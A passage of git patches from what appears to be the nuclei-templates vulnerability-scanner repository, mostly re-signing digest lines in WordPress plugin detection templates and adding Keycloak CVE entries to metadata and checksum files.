4a0a00473045022100efdb6575860e93154df96d44dc41194928624e75c2d635fd5095b141d606d52302202732515bf33cee656e807bed3a6a36e09caaf6dc43635d4d491741be49aa1bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 25893f8186..46297a9ffc 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206076dce8f40a583418ba1639d52d22a5a47aa6c19fa6de08e74a7405fe200c1402204149e14f00c00278741b46df8c8cfeb717b6e2c109664a3f8f5081c65c01cbb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084b810a1c44713300129049347b7b8244592c9f7fdc7dd0afa6d976354556c290221009894ab1e8aa92356f052c5d1f41bbc83e2989ed954bf2dcb2a972af2b551d46c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index ec2091d0e2..f6673ac722 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e0fc3592caf66f6a7ec3475662b7b8eef66727da2e2d02779c3618aa23cd6780022045468f90768642a1757432733e2741198160fb225f0171d5b7d1c2bae0acd762:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201335ac61c2a3e0748260607e9336a0595713c430d9adc2ab661158822564d8110220522edf277fecd7a5f7620e4506dec4f915dbd43464a38fdc08f4f4611febc2bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 1e87982c25..707ea29fda 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c4b8bbf2acd993e18454f95e043aed2933639ff2a4ec19b8bb40ff44d001e781022100992eb3ab83610d1e4c5bf7752627dff99b5901e66591755ed711d4df45250192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d9ad812a786a8a15a41a639a7e06969c96fd95e264b57902ab083d2486d573f0220759288029603c768b89b4ec41aac14fc520c42acc93112530eed3166031b16f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 62f7ccc309..541828a385 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b263e7779a32223731afa647188211733494225e53388266665b1562652144c9022066df19be42efef4bb25107d946891898a93fc8a6ce5a078aa4ddfb27055808bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e126d154015b07cf4cb75f10335539f436c493e167e2da62f88b073c91fbf2c9022022f6cee6144f3262c71f960c590b80d5028db26b93e8ada81108b92a603d592f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index e132590a86..6ad824b772 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200d9191085cc38dfd6103e14ca13cb911127f584ab9f46a54c18e9cb3fd84a43002202548c5fe245954de4786d2e4726495a99e1a52fd3ce908bceaa7890ae3c3fe77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abc3b89b2a779e412a2abf79cd97500fa866453122db45ed2d25e6fd85a4c265022041ebddfc916530ff0afb282bb80cdf4c3866699182064cdcb169eb1da0516fd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 3824cdd1b3..bfedcd7292 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 480a00453043022072b2053cb2ef70be07e1a1c12ca39199c93ce1a85d4c9f8c7e7d1c307845727f021f5e2ed5c5ce771ad449d8e72e727064fd99500f1ab3da3ebc98de80f4ff1c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200c823987dac0c89a80f459c0c7a7cf21eea56fedaacb54688ed9c56f0bf5999c022029f8754715c39212b89676293a8e8dfe15ac747a90a5a14251f4e6ca705d9fc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index a2d2f5dcab..ec93ebe3ca 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022068da174353f08b93f3c544bcf0709b02055eb5eba9b1c58b7dc23eb84949b69a02201547a8d6bfebd3cc0326cde538b9bf9f4b274b9ad434e257706a21ce09f9aa7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204debc55303acccc159ad2d86d7300d0fd838823d936e0cd3bb7fa0d02b02f6650220677a2b4829b6d53718fa96e4274277e9b9c350fed17694377ecd8ab036dc64a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 33b617aab5..bddb13f116 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009b1d97feb3e1375f653c0e90ac46e9c0b497801a177e8b00efe4214ad0fa092002204ec66f8a2a6cdc0d6c3b11aa219ca2af045c098b9ef7ee91a1b167647ba3d4a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220284ebeb70a7d75a909de3d6c151a7ff4cd8a0576d6256bfbe8483cecfda7df0b022100e090797f72fea420b3ef0e48dfef866eba7aadeddd1fac4cbd91eafba111bc50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 17cae7c4a8..ddc937c03e 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210099b6ffb74294f36183680d019ab8cd9bfde9675d6703ed0ab653d1f8abef37e3022048de0fe51d9365407dd70d8a83eb8c07e45b59813edae4bca0f4a0a981200c9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbdc05faf820630a4ef9701ad17c41be30c14653cb8d1af7e37478a6e7008c53022100f35abb36fd3078f790a2f9872957928bcf33dd7e59abc0c6f4337cf62a51af87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 7d6d0f01dc..c37b51a494 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100994e83d1ed70d867f931c07d4a25834a881fd0081a848768ea6f36df3d53d457022016084e546ed9813b2713af9c12c7c55a338f99095bf2169760e34783e2d8fad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d12f3b9088fc2f8c1ef4c7db48ddb53f55a7db32b61a0831a6b36497b0d933a00220184449a892a982f4bda68a5154ee38bdedb17ac5264654a370336d2fb763addb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index a415b9f357..94551797b4 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c73e115d94ba232edb87de1ecdfd9c398afa2a7c7cbf4ae907cc77c37be76e37022100d40b47f71014c2fde2a31955f707f52d0d07e832d24c15ea3097d341ebde7051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203258fda53d77b45464273ba192ce04776643ee837febd37fec323e480e9e90640220629e39c15a60a0d4a79c3211ad876bc2af9896f4dd8f55c3ce0be60084bd3b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 9b4562fe05..d9fdadfc32 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202a936f892318e136f467a479dcad66fa4dd27d314ec3ac26261e3be5674816fb022100ee30b05deee2e5efd98af5ff00220216410742bef81444d27cc12a09052cb845:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008af2fe0381a004f94b0ec928a9dd98d5693c483c8958060f2e978edc06c0afb3022025db443d463513544656908b3b04dc262e45541d0918fe84bb17579e342b18a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index bcd7c76438..d87999fbe3 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100da7ce83ba3ce66e0d4f7822725a5b35b8cc1d516ca701e630170be50cef8cf3002210096f20a20401e9628867a3b842339200694f9101365bf65164237abb30ac06c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e280e172a34e41045f15351237665bb83d42d3b1207487fc0be9056f8c44d7e8022100fbe4114af704e656fdddf2440a4e6aaa2a18b0a494c1370cde1d2d0ad78aeff0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index e5cfd07149..04e2be47f1 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022065d822f0a227d9ac823bf61b694fcb42522fbd636adcde19f9447475009181af022100fc4896f57fe03e699abd5ef938d1c755bdf162182ea4057735c17d2acc6925d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e52fe7976285adc207c1cac2c1fd252d2586e41df3ac97efa23ed95f30366b680220427fbfaf39fb8caa725cc9f8b956379dbca8833a3f21ef31d3295a7a5df64a95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index d5b1dcbd6b..137e14f607 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022038fd186207146b9d27bb387da7c4269224fcaed909292ec3f528b63489a3bfd0022100f3005618a61486c281ec776fb6986f197c80d26dd7276bfd7babd83bb380701c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071520097690de5d1d1f08bb68ce589b5ca113e88b78f8dce27518b75ad35250c022100a3cb6b6f096aeb2bbc4dd0c326c62422e8c5cfc951a0a813ef1a9086fa5b5a11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 0146291a63..1af7a25311 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b1a4235a5e9af365d5419a0943355bbac9b2facf66f22849fc030b821b120aaa02203e6ef1a9391edfd1ba96bd837bbde9f30a84453cefd95eebd8b82f295d583455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b8f1184de3c8623b0cfd54ab380c3e3b9033a836cf8fb6584d35bc25ce76f550221008cfdd506fe812e07b45413a89c2e546b106bff036f20d4c8df9c61f85470cfd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 9196095510..fabbc08664 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220573b5eecef5ee31cb6c8f6ce64b9e52c87b77e2e0091d1ef5fb0e1c116ad8b0002205bac6989ac2dc1f79620a92f47a02e8c8514610a8979b9502e023c220103fd5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022033ef870a5256cd6be30d27135b2ee6e7026edb6a2b0e80f76e0f0164edddb7b8022049ea4833ae79f053e71ebc826e3f35ddc31e501677ead76bc61afef240372129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1e0a1278e7..11174907c6 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022049a58606330fd53f44bdfe2951052f0ae478468c28323dc10e9f6ef7e2aa0e7902203a7bfec9535a602ef7f3ab5bb3b39b2f25efd242f207636af320f65ac609df1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b9b65084d25a4873c3a1044bf2cb9934d2bb195f60ae359344bda6cab9e2b4b0220746d6063a468a4c08339e926b914ce4fd7fabf36cfedf940e9452cc53935c5eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index c76ae069ad..59bdfd3c94 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022044127a5547fc87b68f500f0d29ed93eb5038d06548b1f613dbdd0d6c4f0e1538022100d02bb738611b7a601ae42850f28468bc444205e75e5da425d2d39747cce9a2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eddeedc7503a80422937c3458a127dd49b61ea13628161d0dbd4ab3f3cd6e1f7022100e72f4058ebf62eaf6f1a280b60ff225703e78e722c2e4a213178c8244de2e7f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 2d7d1585fa..d2aff9734d 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022078b492c871ce6912a5c19b1ef8ce8f5e3d3b17b088bbdcfbc87b2863ef61657c0221009cbcbe7b8b21b1600c166fed2efb6fc5033b2c1b424b61064432cf8ce6a719c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e21a2a318721fe907a043148b16439a03ce8cf94d663f10984cfb401266f1099022003029066ee439e110f14e595e23bb3763799e46f64e01acdbbfab3833514512b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index a57ad08439..5e8202b139 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206ae7a2f64ab2fbec3f1a31bfb80665df1614a90b20c258cfea9186b49c97f91b02202c4e6e85c0b1b24ccf98397215a8b8d03867ad27ce86e272a763928c57ffd5b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee12918d28366c58b786b21b5df427fc979af6194e13d294ccbd295a1b8a4f940221008b79738a17d35d8bdb83d19dd95453cf4fb67ed51851e176075b85d0c15452ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml index 52dec1af5a..583a711907 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b1196597c35a5e36a3c31e02bc33def797fb8367fd547fd37d7a9253d9a97bc102202763e78faa636a9bbf8988ab1795122d96b17f94d92460971ea5ec1bdb2b676a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae14cd99d0bb6b2ef7e58bec31775a0beb0a31e9cb14987a5539fe1f6d09d0c202205ce4003dda55572b1f38aa0a7045a1170393016fee0079534234a275cc6dc16d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5fea03d16a314e0a7a4c22c2ed8d16c3a9a5ec73 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:03:19 +0000 Subject: [PATCH 214/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 61df45efb2..729e2c132a 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2024/CVE-2024-44349.yaml http/cves/2024/CVE-2024-45488.yaml http/cves/2024/CVE-2024-46310.yaml http/cves/2024/CVE-2024-5910.yaml +http/cves/2024/CVE-2024-8698.yaml http/default-logins/zebra/zebra-printer-default-login.yaml http/exposed-panels/freescout-panel.yaml http/exposed-panels/paloalto-expedition-panel.yaml From 80a1207cbe5bff1b5702e942fe0b134d8740a463 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:03:26 +0000 Subject: [PATCH 215/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 729e2c132a..3da0336c5d 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ http/cves/2024/CVE-2024-32736.yaml http/cves/2024/CVE-2024-32737.yaml http/cves/2024/CVE-2024-32738.yaml http/cves/2024/CVE-2024-32739.yaml +http/cves/2024/CVE-2024-3656.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From 270ce84bc60633376900fb234cd5a9c839f2f00a Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:03:31 +0000 Subject: [PATCH 216/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 5e428382b6..8441c34154 100644 --- a/cves.json +++ b/cves.json @@ -2564,6 +2564,7 @@ {"ID":"CVE-2024-36401","Info":{"Name":"GeoServer RCE in Evaluating Property Name Expressions","Severity":"critical","Description":"In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36401.yaml"} {"ID":"CVE-2024-36412","Info":{"Name":"SuiteCRM - SQL Injection","Severity":"critical","Description":"SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36412.yaml"} {"ID":"CVE-2024-36527","Info":{"Name":"Puppeteer Renderer - Directory Traversal","Severity":"medium","Description":"puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36527.yaml"} +{"ID":"CVE-2024-3656","Info":{"Name":"Keycloak \u003c 24.0.5 - Broken Access Control","Severity":"high","Description":"A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2024/CVE-2024-3656.yaml"} {"ID":"CVE-2024-36683","Info":{"Name":"PrestaShop productsalert - SQL Injection","Severity":"critical","Description":"In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36683.yaml"} {"ID":"CVE-2024-3673","Info":{"Name":"Web Directory Free \u003c 1.7.3 - Local File Inclusion","Severity":"critical","Description":"The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-3673.yaml"} {"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"} @@ -2689,6 +2690,7 @@ {"ID":"CVE-2024-8503","Info":{"Name":"VICIdial - SQL Injection","Severity":"critical","Description":"An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8503.yaml"} {"ID":"CVE-2024-8517","Info":{"Name":"SPIP BigUp Plugin - Remote Code Execution","Severity":"critical","Description":"SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8517.yaml"} {"ID":"CVE-2024-8522","Info":{"Name":"LearnPress – WordPress LMS - SQL Injection","Severity":"critical","Description":"The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8522.yaml"} +{"ID":"CVE-2024-8698","Info":{"Name":"Keycloak - SAML Core Package Signature Validation Flaw","Severity":"high","Description":"A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2024/CVE-2024-8698.yaml"} {"ID":"CVE-2024-8752","Info":{"Name":"WebIQ 2.15.9 - Directory Traversal","Severity":"high","Description":"The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8752.yaml"} {"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"} {"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 48ea6768f0..1c35de8cd8 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -9500bb9eed0648de44319a9fd94fbc06 +927dc1164f3b6743928b787a83f64ae5 From f0a872bd27ab8ff959101cd36b790720661da718 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 13:03:45 +0000 Subject: [PATCH 217/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 412 +++++++++++++++++++++-------------------- 1 file changed, 207 insertions(+), 205 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b1ff731218..6304f54a2d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3785,6 +3785,7 @@ http/cves/2024/CVE-2024-36104.yaml:c947866029e43be7cdd5aae943b4338e5ad92919 http/cves/2024/CVE-2024-36401.yaml:2439f9a75658efa3cb4cc61de851bce44ed55dec http/cves/2024/CVE-2024-36412.yaml:1f57cbef478515718f37a290474753a1ebe76505 http/cves/2024/CVE-2024-36527.yaml:91eaa0df2c1a29ff57238921b54909e2b12f4fdf +http/cves/2024/CVE-2024-3656.yaml:18b16781b4963eeb3f83d31c2eb3db526e5591cf http/cves/2024/CVE-2024-36683.yaml:424bd3cd0fcea8f461c5ba7ea9e99b7388199b61 http/cves/2024/CVE-2024-3673.yaml:509aef7623742067ef6139ef9f8c36fa9b2fac49 http/cves/2024/CVE-2024-36837.yaml:e7eb336e92d1b6e46f12e1adf620d8d1aa4a50fe @@ -3840,7 +3841,7 @@ 